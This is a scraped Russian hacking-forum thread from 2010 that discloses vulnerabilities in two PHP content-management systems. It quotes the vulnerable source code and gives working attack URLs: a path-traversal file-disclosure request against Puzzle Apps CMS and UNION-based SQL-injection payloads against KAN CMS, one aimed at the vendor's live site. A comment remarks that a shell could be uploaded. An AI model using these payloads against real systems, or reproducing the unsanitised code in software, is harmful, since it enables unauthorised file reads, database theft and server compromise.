Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2010, 23:31
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Puzzle Apps CMS 3.2
site:www.puzzleapps.org
File Disclosure
file: filepresenter.loader.php
PHP код:
if ($_GET["getfile"]) {
$filename = $_GET["filename"];
if (! $filename)
$filename = "file";
header('Content-Disposition: attachment; filename="' . $filename . '"');
header("Content-type: application/octetstream");
header("Pragma: no-cache");
header("Expires: 0");
readfile($FILEROOT . $_GET["getfile"], "r+");
die();
}
result:
Код:
filepresenter.loader.php?getfile=../../[local_file]&filename=wtf.txt
|
|
|
17.06.2010, 17:39
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
KAN CMS 1.0 beta
site: www.kancms.org
SQL-Injection
need: mq=off
file: pages/sections.php
PHP код:
include('site_selector.php');
// next we'll include the section manager component to enable the template
// easily pick information from database
include('sections_manager.php');
// next we need to load the specific theme / template index file
// the $themeFolder variable is created in the site selector
include( $themeFolder . 'pages/sections.php');
/***************************************************************************/
//file: pages/site_selector.php
if( !isset($_GET['siteid']) ) {
//header("Location: ../pages/");
$query = "SELECT * FROM sites WHERE sitetype = 'main'";
$rsSite = mysql_query($query, $config);
$row_rsSite = mysql_fetch_assoc($rsSite);
$site_identifier = $row_rsSite['SiteIdentifier'];
mysql_free_result($rsSite);
$_GET['siteid'] = $site_identifier;
} else {
$site_identifier = $_GET['siteid'];
}
// find the site ID for the specified identifier
$query = "SELECT * FROM sites WHERE SiteIdentifier = '$site_identifier'";
$rsSite = mysql_query($query, $config);
$row_rsSite = mysql_fetch_assoc($rsSite);
result:
Код:
/pages/sections.php?siteid=-kan'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+&mid=3&sid=6
Также уязвим пареметр mid
Код:
/pages/sections.php?siteid=kan&mid=-1+union+select+1,2,3,4,5,6,7,8,9+--+&sid=6
example:
Код:
http://www.kancms.org/pages/sections.php?siteid=kan&mid=-3+/*!union*/+select+1,2,3,4,5,6,7,8,9+--+&sid=6
//мб нашел бы больше,но двиг,сцуко,не установился
//Двойной запрос, можно шелл залить Ctacok
// а так не залить что-ли, если требования mq=off? Jokester
Последний раз редактировалось Jokester; 17.06.2010 в 18:39..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
